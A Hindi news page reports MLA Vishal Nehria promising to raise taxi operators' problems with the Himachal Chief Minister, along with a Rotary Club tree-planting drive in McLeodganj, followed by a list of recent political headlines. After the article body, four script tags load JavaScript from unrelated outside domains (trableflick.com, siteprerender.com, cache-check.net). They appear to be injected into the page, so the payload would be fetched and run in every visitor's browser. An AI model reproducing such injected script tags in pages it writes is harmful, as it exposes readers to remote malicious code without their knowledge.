Categories: हिमाचल

मुख्यमंत्री से मिल कर करवायेंगे टैक्सी ऑप्रेटरों की समस्याओं का समाधान: नेहरिया

<p>विशाल नेहरिया ने आज मैक्लोडगंज में कहा कि टैक्सी ऑप्रेटरों की समस्याओं समस्याओं का समाधान करना उनका मान सम्मान रखना हमारी जिम्मेदारी है। उन्होंने कहा कि टैक्सी आप्रेटर हमारे परिवार के सदस्यों की तरह हैं, इनकी समस्याओं के समाधान के लिये वे स्वयं मुख्यमंत्री जयराम ठाकुर से मिलेंगे। इससे पहले उन्होंने रोटरी क्लब ऑफ धर्मशाला की ओर से शनिवार को मैक्लोडगंज के भागसुनाग में पर्यावरण और हरियाली के लिए पौधारोपण को प्राथमिकता देते हुए पौधारोपण किया। रोटरी द्वारा गोद लिए भागसुनागा में विधायक विशाल नेहरिया द्वारा पौधा रोपित करने के साथ हुई। पौधारोपण और वितरण कार्यक्रम में कुल 235 पौधों का वितरण किया गया। इसमें आम देवदार, आंवला, शरीफा, नींबू एवं अन्य इमारती पौधे जैसे शीशम, ग्महार आदि शामिल है।</p>

<p>इस दौरान ग्रामीणों ने इन पौधों को लेकर इनके रोपण और उनके बड़े होने के प्रति प्रतिबद्धता जताई। प्रेजिडेंट रोटेरियन मिलाप नेहरिया ने बताया हमारे जीवन में पेड़ों का होना बेहद महत्वपूर्ण है। पेड़ पौधे हमारे जीवन क्रम का एक महत्वपूर्ण हिस्सा है जो हमें न सिर्फ ऑक्सीजन प्रदान करते हैं बल्कि वातावरण से कार्बन डाइऑक्साइड को खत्म करते हैं। हमारा उद्देश्य केवल पौधा लगाना नहीं बल्कि उसे बचाना और बड़ा करना भी। उन्होंने बताया कि सत्र 2020-21 में 500 पौधों के रोपण और वितरण का लक्ष्य रखा गया है।</p>

<p>विधायक विशाल नेहरिया ने कहा कि पर्यावरण को बचाने के दृष्टिकोण से रोटरी क्लब का यह एक बेहद महत्वपूर्ण और महत्वाकांक्षी कार्यक्रम है। उन्होंने कहा कि सिर्फ पौधा लगाकर हमारी जिम्मेदारी पूरी नहीं हो जाती है। भले ही हम कम संख्या में पौधे लगाए मगर उनके परिपक्व होने तक उनके संरक्षण की जिम्मेदारी भी हमारी है। क्लब के सेक्रेटरी डॉ. सतीश सूद ने कहा कि कोरोना महामारी के इस दौर में उनकी संस्था ने पर्यावरण संरक्षण का संदेश देने का काम किया है। उनका उद्देश्य प्रदूषण मुक्त समाज बनाना है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1594463329128″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

जय राम ठाकुर ने विधानसभा में दी भगवान को चुनौती : सीएम

भरमौर (चंबा): चंबा जिले के भरमौर में चुनावी जनसभा को सम्बोधित करते हुए मुख्यमंत्री ठाकुर…

6 hours ago

देशवासी सिर्फ़ नरेन्द्र मोदी को ही प्रधानमंत्री बनाने के लिए उत्सुक है: जयराम ठाकुर

शिमला : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि भारतवासी  नरेन्द्र मोदी को तीसरी बार…

6 hours ago

हिमाचल प्रदेश में चल रही है मित्रों की सरकार: डॉ. राजीव भारद्वाज

कांगड़ा-चंबा लोकसभा भाजपा प्रत्याशी डॉ. राजीव भारद्वाज ने कहा की हिमाचल प्रदेश में मित्रों की…

6 hours ago

किसानों के मुद्दों को प्राथमिकता में शामिल करने वालों को समर्थन देगा संयुक्त किसान

लोकसभा चुनाव को लेकर हिमाचल में किसानो के विभिन्न संगठनों ने संयुक्त किसान मंच के…

6 hours ago

सुक्खू सरकार की गलत नीतियों से हिमाचल से बड़े बड़े उद्योगों का हुआ पलायन

हिमाचल प्रदेश में पिछले 16 महीने के कांग्रेस सरकार के कार्यकाल में उद्योगों का प्रदेश…

6 hours ago

डॉ यशवंत सिंह परमार की 44 वी पुण्यतिथि , कांग्रेस कार्यालय में दी श्रद्धाजंलि

हिमाचल निर्माता व प्रथम मुख्यमंत्री डॉ यशवंत सिंह परमार की 44वी पुण्यतिथि पर प्रदेश भर…

9 hours ago